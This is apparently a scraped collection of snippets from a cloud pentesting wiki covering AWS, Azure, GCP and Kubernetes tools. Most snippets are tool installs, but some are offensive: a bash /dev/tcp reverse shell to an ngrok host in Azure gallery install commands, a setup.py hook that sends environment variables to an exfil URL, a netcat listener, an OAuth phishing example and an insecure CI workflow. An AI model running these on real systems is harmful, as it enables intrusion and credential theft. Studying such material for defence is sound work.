### Install Starbase with Docker

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/pentesting-cloud-methodology.md

Clone the Starbase repository, copy the example configuration, build the Docker image, and run setup and run commands using Docker Compose. This method is an alternative to local Node.js installation.

```bash
# Docker
git clone https://github.com/JupiterOne/starbase.git
cd starbase
cp config.yaml.example config.yaml
# Configure manually config.yaml depending on the env to analyze
docker build --no-cache -t starbase:latest .
docker-compose run starbase setup
docker-compose run starbase run
```

--------------------------------

### Install Vertex AI SDK

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-vertex-ai-privesc.md

Initial setup required to interact with Vertex AI services via Python.

```bash
# Install the Vertex AI SDK first
pip install google-cloud-aiplatform
```

--------------------------------

### Start Stormspotter Backend

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-enumeration-tools.md

Starts the Stormspotter backend service. Ensure you are in the correct directory and have pipenv installed.

```bash
cd stormspotter\backend\
pipenv shell
python ssbackend.pyz
```

--------------------------------

### Run OAuth Phishing Example

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md

Clones the repository, installs dependencies, and executes the application with provided client credentials.

```bash
git clone https://github.com/carlospolop/gcp_oauth_phishing_example
cd gcp_oauth_phishing_example
pip install flask requests google-auth-oauthlib
python3 app.py --client-id "" --client-secret ""
```

--------------------------------

### Setup SAML Federation Environment

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md

Sets up a Python virtual environment and installs necessary libraries for forging IdP metadata and SAML assertions.

```bash
python3 -m venv /tmp/saml-federation-venv
source /tmp/saml-federation-venv/bin/activate
pip install lxml signxml
```

--------------------------------

### Install and run Steampipe for Kubernetes compliance

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md

Use these commands to install Steampipe and Powerpipe, initialize the compliance module, and start the dashboard server.

```bash
# Install Steampipe
brew install turbot/tap/powerpipe
brew install turbot/tap/steampipe
steampipe plugin install kubernetes

# Start the service
steampipe service start

# Install the module
mkdir dashboards
cd dashboards
powerpipe mod init
powerpipe mod install github.com/turbot/steampipe-mod-kubernetes-compliance

# Run the module
powerpipe server
```

--------------------------------

### Install and run Kubescape

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md

Install the Kubescape CLI and execute a security scan on the cluster.

```bash
curl -s https://raw.githubusercontent.com/kubescape/kubescape/master/install.sh | /bin/bash
kubescape scan --verbose
```

--------------------------------

### Start Stormspotter Frontend

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-enumeration-tools.md

Starts the Stormspotter frontend service. Ensure you are in the correct directory.

```bash
cd stormspotter\frontend\dist\spa\
quasar.cmd serve -p 9091 --history
```

--------------------------------

### Install ScoutSuite

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/pentesting-cloud-methodology.md

Sets up a virtual environment and installs ScoutSuite via pip.

```bash
mkdir scout; cd scout
virtualenv -p python3 venv
source venv/bin/activate
pip install scoutsuite
scout --help

## Using Docker: https://github.com/nccgroup/ScoutSuite/wiki/Docker-Image
```

--------------------------------

### Run HackTricks Cloud Locally

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/README.md

Clones the repository and starts the application in a Docker container. Ensure Docker is installed and the environment variable for language is set correctly.

```bash
# Download latest version of hacktricks cloud
git clone https://github.com/HackTricks-wiki/hacktricks-cloud

# Select the language you want to use
export LANG="master" # Leave master for English
# "af" for Afrikaans
# "de" for German
# "el" for Greek
# "es" for Spanish
# "fr" for French
# "hi" for Hindi
# "it" for Italian
# "ja" for Japanese
# "ko" for Korean
# "pl" for Polish
# "pt" for Portuguese
# "sr" for Serbian
# "sw" for Swahili
# "tr" for Turkish
# "uk" for Ukrainian
# "zh" for Chinese

# Run the docker container indicating the path to the hacktricks-cloud folder
docker run -d --rm --platform linux/amd64 -p 3377:3000 --name hacktricks_cloud -v $(pwd)/hacktricks-cloud:/app ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image bash -c "mkdir -p ~/.ssh && ssh-keyscan -H github.com >> ~/.ssh/known_hosts && cd /app && git checkout $LANG && git pull && MDBOOK_PREPROCESSOR__HACKTRICKS__ENV=dev mdbook serve --hostname 0.0.0.0"
```

--------------------------------

### Install and Run CloudSploit

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/pentesting-cloud-methodology.md

Instructions for cloning the repository, installing dependencies, and running the help command.

```bash
# Install
git clone https://github.com/aquasecurity/cloudsploit.git
cd cloudsploit
npm install
./index.js -h
## Docker instructions in github
```

--------------------------------

### Install Starbase with Node.js

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/pentesting-cloud-methodology.md

Install Node.js version 14 using nvm, then clone the Starbase repository, install dependencies, and run the help command. Starbase collects assets and relationships into a Neo4j graph.

```bash
# You are going to need Node version 14, so install nvm following https://tecadmin.net/install-nvm-macos-with-homebrew/
npm install --global yarn
nvm install 14
git clone https://github.com/JupiterOne/starbase.git
cd starbase
nvm use 14
yarn install
yarn starbase --help
# Configure manually config.yaml depending on the env to analyze
yarn starbase setup
yarn starbase run
```

--------------------------------

### Install and Use Cognito Scanner

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md

Commands for installing and displaying help for the Cognito Scanner CLI tool.

```bash
$ pip install cognito-scanner
```

```bash
$ cognito-scanner --help
```

--------------------------------

### Install and Use Pacu Framework

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/README.md

Installation and CLI usage for the Pacu AWS exploitation framework.

```bash
# Install
## Feel free to use venvs
pip3 install pacu

# Use pacu CLI
pacu
> import_keys # import 1 profile from .aws/credentials
> import_keys --all # import all profiles
> list # list modules
> exec iam__enum_permissions # Get permissions
> exec iam__privesc_scan # List privileged permissions
```

--------------------------------

### Install Cloudlist Tool

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/pentesting-cloud-methodology.md

Download, unzip, and install the Cloudlist tool to your system's PATH. This tool is used for discovering assets in cloud environments.

```bash
cd /tmp
wget https://github.com/projectdiscovery/cloudlist/releases/latest/download/cloudlist_1.0.1_macOS_arm64.zip
unzip cloudlist_1.0.1_macOS_arm64.zip
chmod +x cloudlist
sudo mv cloudlist /usr/local/bin
```

--------------------------------

### Install Kubesec

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md

Instructions for installing Kubesec, a tool for scanning Kubernetes configurations. Download binaries from GitHub releases.

```bash
# Install Kubesec
## Download from https://github.com/controlplaneio/kubesec/releases
```

--------------------------------

### Create Gallery Application for Linux Reverse Shell

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md

This example demonstrates creating an Azure Compute Gallery application with a Linux reverse shell payload. It includes steps for creating the gallery, the application container, and the application version with install, remove, and update commands.

```bash
# Create gallery (if there isn't any)
az sig create --resource-group myResourceGroup \
  --gallery-name myGallery --location "West US 2"
```

```bash
# Create application container
az sig gallery-application create \
  --application-name myReverseShellApp \
  --gallery-name myGallery \
  --resource-group \
  --os-type Linux \
  --location "West US 2"
```

```bash
# Create app version with the rev shell
## In Package file link just add any link to a blob storage file
az sig gallery-application version create \
  --version-name 1.0.2 \
  --application-name myReverseShellApp \
  --gallery-name myGallery \
  --location "West US 2" \
  --resource-group \
  --package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \
  --install-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \
  --remove-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \
  --update-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'"
```

--------------------------------

### Install Steampipe

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/pentesting-cloud-methodology.md

Installs Steampipe using Homebrew.

```bash
brew tap turbot/tap
brew install steampipe
```

--------------------------------

### Install PurplePanda Tool

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/pentesting-cloud-methodology.md

Installs the PurplePanda tool, sets up a virtual environment, installs dependencies, and configures the Neo4j connection URL and password. Ensure Neo4j is installed and running separately.

```bash
git clone https://github.com/carlospolop/PurplePanda
cd PurplePanda
python3 -m venv .
source bin/activate
python3 -m pip install -r requirements.txt
export PURPLEPANDA_NEO4J_URL="bolt://neo4j@localhost:7687"
export PURPLEPANDA_PWD="neo4j_pwd_4_purplepanda"
python3 main.py -h # Get help
```

--------------------------------

### Install and Use Cloudsplaining

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/README.md

Installation and policy download commands for assessing IAM security and least privilege violations.

```bash
# Install
pip install cloudsplaining

# Download IAM policies to check
## Only the ones attached with the versions used
cloudsplaining download --profile dev
```

--------------------------------

### Start MySQL Server

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.md

Starts a stopped MySQL Flexible Server instance to restore availability.

```bash
az mysql flexible-server start \
  --name \
  --resource-group
```

--------------------------------

### Install FlareProx and Dependencies

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-ci-cd/cloudflare-security/cloudflare-workers-pass-through-proxy-ip-rotation.md

Clone the FlareProx repository and install its Python dependencies using pip.

```bash
git clone https://github.com/MrTurvey/flareprox
cd flareprox
pip install -r requirements.txt
```

--------------------------------

### Install and Run terraform-compliance

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-ci-cd/terraform-security.md

Installs terraform-compliance via pip, generates a Terraform plan, and then runs the compliance check on a folder.

```bash
pip install terraform-compliance
terraform plan -out=plan.out
terraform-compliance -f /path/to/folder
```

--------------------------------

### Install cbt CLI

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-bigtable-post-exploitation.md

Install the `cbt` CLI using the Cloud SDK. This tool is necessary for interacting with Bigtable tables directly.

```bash
gcloud components install cbt
```

--------------------------------

### Install and Configure Cartography

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/README.md

Installation instructions and command to fetch AWS information using a Neo4j database backend.

```bash
# Install
pip install cartography
## At the time of this writing you need neo4j version 3.5.*

# Get AWS info
AWS_PROFILE=dev cartography --neo4j-uri bolt://127.0.0.1:7687 --neo4j-password-prompt --neo4j-user neo4j
```

--------------------------------

### Install Azure Desktop Virtualization Extension

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-services/az-virtual-desktop.md

Before enumerating Azure Virtual Desktop resources, ensure you have the 'desktopvirtualization' extension installed for Azure CLI. This is a prerequisite for all subsequent commands.

```bash
az extension add --name desktopvirtualization
```

--------------------------------

### Initialize Serverless Project

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-ci-cd/serverless.com-security.md

Commands to install the CLI, create a project directory, and generate a template.

```bash
# Create temp folder for the tutorial
mkdir /tmp/serverless-tutorial
cd /tmp/serverless-tutorial

# Install Serverless cli
npm install -g serverless

# Generate template
serverless # Choose first one (AWS / Node.js / HTTP API)
## Indicate a name like "Tutorial"
## Login/Register
## Create A New App
## Indicate a name like "tutorialapp"
```

--------------------------------

### Start PostgreSQL Flexible Server

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.md

Start a stopped Azure PostgreSQL Flexible Server instance. Requires 'Microsoft.DBforPostgreSQL/flexibleServers/start/action' permission.

```bash
az postgres flexible-server start \
  --name \
  --resource-group
```

--------------------------------

### Start Local etcd with Snapshot

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md

Starts a local etcd instance using a restored snapshot, allowing direct interaction with the historical etcd data.

```bash
etcd \
  --data-dir=./restore \
  --initial-cluster=state=existing \
  --snapshot='./etcd-loot-backup.db'
```

--------------------------------

### List and Describe SQL Instances

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md

Use these commands to list all SQL instances in your project and describe a specific instance to retrieve its details like IPs and certificates.

```bash
gcloud sql instances list
gcloud sql instances describe # get IPs, CACert, settings
```

--------------------------------

### Send GET Request via Worker

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-ci-cd/cloudflare-security/cloudflare-workers-pass-through-proxy-ip-rotation.md

Example of sending a GET request through a Cloudflare Worker to a specified URL.

```bash
# GET
curl "https://your-worker.account.workers.dev?url=https://httpbin.org/get"
```

--------------------------------

### Get Refresh and Access Token Example

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md

This Python script uses the MSAL library to perform a device code flow authentication for the Microsoft Graph API. It then shows how to decode the JWT access token and acquire new tokens using a refresh token. Ensure you have the 'msal', 'requests', and 'jwt' libraries installed.

```python
# Code example from https://github.com/secureworks/family-of-client-ids-research
import msal
import requests
import jwt
from pprint import pprint
from typing import Any, Dict, List

# LOGIN VIA CODE FLOW AUTHENTICATION
azure_cli_client = msal.PublicClientApplication(
    "00b41c95-dab0-4487-9791-b9d2c32c80f2"  # ID for Office 365 Management
)
device_flow = azure_cli_client.initiate_device_flow(
    scopes=["https://graph.microsoft.com/.default"]
)
print(device_flow["message"])

# Perform device code flow authentication
azure_cli_bearer_tokens_for_graph_api = azure_cli_client.acquire_token_by_device_flow(
    device_flow
)
pprint(azure_cli_bearer_tokens_for_graph_api)


# DECODE JWT
def decode_jwt(base64_blob: str) -> Dict[str, Any]:
    """Decodes base64 encoded JWT blob"""
    return jwt.decode(
        base64_blob, options={"verify_signature": False, "verify_aud": False}
    )


decoded_access_token = decode_jwt(
    azure_cli_bearer_tokens_for_graph_api.get("access_token")
)
pprint(decoded_access_token)

# GET NEW ACCESS TOKEN AND REFRESH TOKEN
new_azure_cli_bearer_tokens_for_graph_api = (
    # Same client as original authorization
    azure_cli_client.acquire_token_by_refresh_token(
        azure_cli_bearer_tokens_for_graph_api.get("refresh_token"),
        # Same scopes as original authorization
        scopes=["https://graph.microsoft.com/.default"],
    )
)
pprint(new_azure_cli_bearer_tokens_for_graph_api)
```

--------------------------------

### Install and Run tfsec

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-ci-cd/terraform-security.md

Installs tfsec using Homebrew and then runs a static analysis scan on a specified folder of Terraform code.

```bash
brew install tfsec
tfsec /path/to/folder
```

--------------------------------

### Install and Use Principal Mapper (PMapper)

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/README.md

Commands for installing PMapper, generating graph data, and performing IAM privilege escalation analysis.

```bash
# Install
pip install principalmapper

# Get data
pmapper --profile dev graph create
pmapper --profile dev graph display # Show basic info

# Generate graph
pmapper --profile dev visualize # Generate svg graph file (can also be png, dot and graphml)
pmapper --profile dev visualize --only-privesc # Only privesc permissions

# Generate analysis
pmapper --profile dev analysis

## Run queries
pmapper --profile dev query 'who can do iam:CreateUser'
pmapper --profile dev query 'preset privesc *' # Get privescs with admins

# Get organization hierarchy data
pmapper --profile dev orgs create
pmapper --profile dev orgs display
```

--------------------------------

### Get Installed VM Extensions (PowerShell)

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-services/vms/README.md

Lists all extensions installed on a specific virtual machine. Requires VM name and resource group.

```powershell
Get-AzVMExtension -ResourceGroupName -VMName
```

--------------------------------

### Create VM instance from image

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md

Launches a new VM instance using an image from a source project.

```bash
gcloud compute instances create [INSTANCE_NAME] \
  --project=[TARGET_PROJECT_ID] \
  --zone=[ZONE] \
  --image=projects/[SOURCE_PROJECT_ID]/global/images/[IMAGE_NAME]
```

--------------------------------

### Install and Configure Steampipe for Azure

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-enumeration-tools.md

Install Steampipe and Powerpipe, configure Azure plugins, and set environment variables for authentication. This setup is used for running Azure compliance and insights modules.

```bash
# Install
brew install turbot/tap/powerpipe
brew install turbot/tap/steampipe
steampipe plugin install azure
steampipe plugin install azuread

# Config creds via env vars or az cli default creds will be used
export AZURE_ENVIRONMENT="AZUREPUBLICCLOUD"
export AZURE_TENANT_ID=""
export AZURE_SUBSCRIPTION_ID=""
export AZURE_CLIENT_ID=""
export AZURE_CLIENT_SECRET=""

# Run steampipe-mod-azure-insights
cd /tmp
mkdir dashboards
cd dashboards
powerpipe mod init
powerpipe mod install github.com/turbot/steampipe-mod-azure-insights
steampipe service start
powerpipe server
# Go to http://localhost:9033 in a browser
```

--------------------------------

### Kubernetes API Verb Requests

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md

Examples of HTTP requests for get, list, and watch operations on deployment resources.

```http
GET /apis/apps/v1/namespaces/{namespace}/deployments/{name}
```

```http
#In a namespace
GET /apis/apps/v1/namespaces/{namespace}/deployments
#In all namespaces
GET /apis/apps/v1/deployments
```

```http
GET /apis/apps/v1/deployments?watch=true
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments?watch=true
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments/{name} [DEPRECATED]
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments [DEPRECATED]
GET /apis/apps/v1/watch/deployments [DEPRECATED]
```

--------------------------------

### Get User ImmutableId

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.md

Retrieves the ImmutableId for an on-premises user in Azure AD. This is the unique identifier derived from the on-premises GUID.

```powershell
# Get the ImmutableId of an on-prem user in Azure AD (this is the Unique Identifier derived from on-prem GUID)
Get-AADIntUser -UserPrincipalName onpremadmin@domain.onmicrosoft.com | select ImmutableId
```

--------------------------------

### Create setup.py File for Python Library

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md

Defines the metadata for a Python package, including its name, version, and dependencies, enabling it to be built and uploaded.

```python
# setup.py
from setuptools import setup, find_packages

setup(
    name='hello_world',
    version='0.1',
    packages=find_packages(),
    install_requires=[
        # Any dependencies your library needs
    ],
)
```

--------------------------------

### Describe AWS Organization

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md

Use this command to get information about your AWS Organization. No specific setup is required beyond having AWS CLI configured.

```bash
aws organizations describe-organization
```

--------------------------------

### Create VM with reverse shell in metadata

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md

Launches a VM with a startup script in the metadata to execute a reverse shell.

```bash
--metadata startup-script='#! /bin/bash
echo "hello"; '
```

--------------------------------

### Request Signing Using Python

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md

Python code example using the `requests` and `requests-aws4auth` libraries to sign requests for API Gateway. Ensure you have `boto3` installed as well.

```python
# Install the dependencies first (shell commands, not Python):
#   pip install requests
#   pip install requests-aws4auth
#   pip install boto3

import boto3
import requests
from requests_aws4auth import AWS4Auth

region = 'us-east-1'  # Region
service = 'execute-api'
access_key = 'YOUR_ACCESS_KEY'
secret_key = 'YOUR_SECRET_KEY'

url = 'https://.execute-api.us-east-1.amazonaws.com//'

# Build SigV4 credentials from the configured access keys
session = boto3.Session(aws_access_key_id=access_key, aws_secret_access_key=secret_key)
credentials = session.get_credentials()
awsauth = AWS4Auth(credentials.access_key, credentials.secret_key, region, service, session_token=credentials.token)

# Send the signed request
response = requests.get(url, auth=awsauth)

print(response.text)
```

--------------------------------

### List App Engine Versions

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md

Lists all deployed versions for a Google App Engine application. No specific setup is required beyond having the gcloud CLI installed and authenticated.

```bash
gcloud app versions list
```

--------------------------------

### List Azure Management Groups

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md

Use this command to list all management groups in your Azure environment. No specific setup is required beyond having the Azure CLI installed and authenticated.

```bash
az account management-group list
```

--------------------------------

### Create Malicious setup.py

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md

Define a setup.py file that executes malicious code during the installation process.

```bash
cat > setup.py << 'EOF'
import setuptools
from setuptools.command.install import install
import os
import urllib.request
import urllib.parse

def malicious_function():
    data = dict(os.environ)
    encoded_data = urllib.parse.urlencode(data).encode()
    url = 'https:///exfil'
    req = urllib.request.Request(url, data=encoded_data)
    urllib.request.urlopen(req)

class AfterInstall(install):
    def run(self):
        install.run(self)
        malicious_function()

setuptools.setup(
    name = "",
    version = "0.1.1",
    packages = [""],
    cmdclass={'install': AfterInstall},
)
EOF
```

--------------------------------

### Create SageMaker Notebook Instance

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc/README.md

Initializes a new notebook instance with a specified IAM role.

```bash
aws sagemaker create-notebook-instance --notebook-instance-name example \
  --instance-type ml.t2.medium \
  --role-arn arn:aws:iam:::role/service-role/
```

--------------------------------

### Configure .bashrc for Automatic Proxy Startup

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md

Adds commands to the .bashrc file to automatically install Squid, configure it, start the service, and expose it via ngrok upon shell startup.

```bash
sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok;./ngrok tcp 3128
```

--------------------------------

### Get Insight Rule Report

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md

Retrieves a report of data collected over a specified time range for a Contributor Insight rule. Requires rule name, start time, end time, and period.

```bash
aws cloudwatch get-insight-rule-report --rule-name --start-time --end-time --period
```

--------------------------------

### List Compute Instance Templates

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md

Lists all available instance templates in the project. This is useful for discovering configurations used to deploy consistent VM instances.

```bash
gcloud compute instance-templates list
```

--------------------------------

### Describe Auto Scaling Launch Configurations

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md

List all launch configurations used by Auto Scaling groups. This provides details on how instances are launched.

```bash
aws autoscaling describe-launch-configurations
```

--------------------------------

### Workflow HTTP Request with OIDC Token

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md

Example of a Workflow step making an HTTP GET request using OIDC authentication. This allows interaction with services like Cloud Functions by specifying an audience.

```yaml
- step_A:
    call: http.get
    args:
      url: https://us-central1-project.cloudfunctions.net/functionA
      query:
        firstNumber: 4
        secondNumber: 6
        operation: sum
      auth:
        type: OIDC
        audience: OIDC_AUDIENCE
```

--------------------------------

### List Azure Virtual Networks (VNets) with Azure CLI

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md

Lists all VNets in an Azure account, displaying their name, location, and address space. No specific setup is required beyond having the Azure CLI installed and authenticated.

```bash
# List VNets
az network vnet list --query "[].{name:name, location:location, addressSpace:addressSpace}"
```

--------------------------------

### Start Interactive Session on EC2 Instances via SSM StartSession

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc/README.md

Utilize `ssm:StartSession` to initiate an SSH-like interactive session with an EC2 instance. The Session Manager Plugin must be installed on the client machine to use this functionality.

```bash
aws ssm describe-instance-information
aws ssm describe-sessions --state Active
```

```bash
aws ssm start-session --target "$INSTANCE_ID"
```

--------------------------------

### Setup RDS Proxy Lab Environment

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation/README.md

Commands to create a minimal lab environment for testing RDS proxy credential harvesting.

```bash
REGION=us-east-1
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
SECRET_ARN=$(aws secretsmanager create-secret \
  --region $REGION --name rds/proxy/aurora-demo \
  --secret-string username:admin \
  --query ARN --output text)
aws iam create-role --role-name rds-proxy-secret-role \
  --assume-role-policy-document Version:2012-10-17
aws iam attach-role-policy --role-name rds-proxy-secret-role \
  --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite
aws rds create-db-proxy --db-proxy-name p0 --engine-family MYSQL \
  --auth [AuthScheme:SECRETS] \
  --role-arn arn:aws:iam::$ACCOUNT_ID:role/rds-proxy-secret-role \
  --vpc-subnet-ids $(aws ec2 describe-subnets --filters Name=default-for-az,Values=true --query Subnets[].SubnetId --output text)
aws rds wait db-proxy-available --db-proxy-name p0
```

--------------------------------

### Create Installation Access Token

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-ci-cd/github-security/README.md

Requests an installation-specific access token using a valid JWT.

```bash
INSTALL_ID=12345678
curl -sS -X POST \
  -H "Authorization: Bearer $JWT" \
  -H "Accept: application/vnd.github+json" \
  -H "X-GitHub-Api-Version: 2022-11-28" \
  https://api.github.com/app/installations/$INSTALL_ID/access_tokens
```

--------------------------------

### Host Payload and Setup Netcat Listener

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.md

Starts a Python SimpleHTTPServer on port 80 to host the payload and a Netcat listener on port 443 to capture incoming reverse shell connections. This is typically done on the attacker's Kali machine.

```bash
sudo python -m SimpleHTTPServer 80
```

```bash
sudo nc -nlvp 443
```

--------------------------------

### Set up ScoutSuite Environment

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-enumeration-tools.md

Create a Python virtual environment, activate it, install ScoutSuite, and view its help information. ScoutSuite is a multi-cloud security auditing tool for assessing cloud environments.

```bash
virtualenv -p python3 venv
source venv/bin/activate
pip install scoutsuite
scout --help

# Use --cli flag to use az cli credentials
# Use --user-account to have scout prompt for user credentials
# Use --user-account-browser to launch a browser to login
```

--------------------------------

### Checkout Pull Request Code in `pull_request_target` Workflow

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md

This example demonstrates an insecure configuration where a `pull_request_target` workflow explicitly checks out code from the PR's head commit. This can lead to arbitrary code execution if the workflow runs build scripts or installs packages controlled by the PR author.

```yaml
# INSECURE. Provided as an example only.
on: pull_request_target

jobs:
  build:
    name: Build and test
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
        with:
          ref: ${{ github.event.pull_request.head.sha }}

      - uses: actions/setup-node@v1
      - run: |
          npm install
          npm build

      - uses: completely/fakeaction@v2
        with:
          arg1: ${{ secrets.supersecret }}

      - uses: fakerepo/comment-on-pr@v1
        with:
          message: |
            Thank you!
```

--------------------------------

### Kubernetes CSR Approver ClusterRole Example

Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md

This YAML defines a ClusterRole for approving Certificate Signing Requests (CSRs) in Kubernetes. It grants permissions to get, list, watch, create CSRs, update CSR approvals, and approve specific signers. Ensure the 'resourceNames' match your signer configuration.

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: csr-approver
rules:
  - apiGroups:
      - certificates.k8s.io
    resources:
      - certificatesigningrequests
    verbs:
      - get
      - list
      - watch
      - create
  - apiGroups:
      - certificates.k8s.io
    resources:
      - certificatesigningrequests/approval
    verbs:
      - update
  - apiGroups:
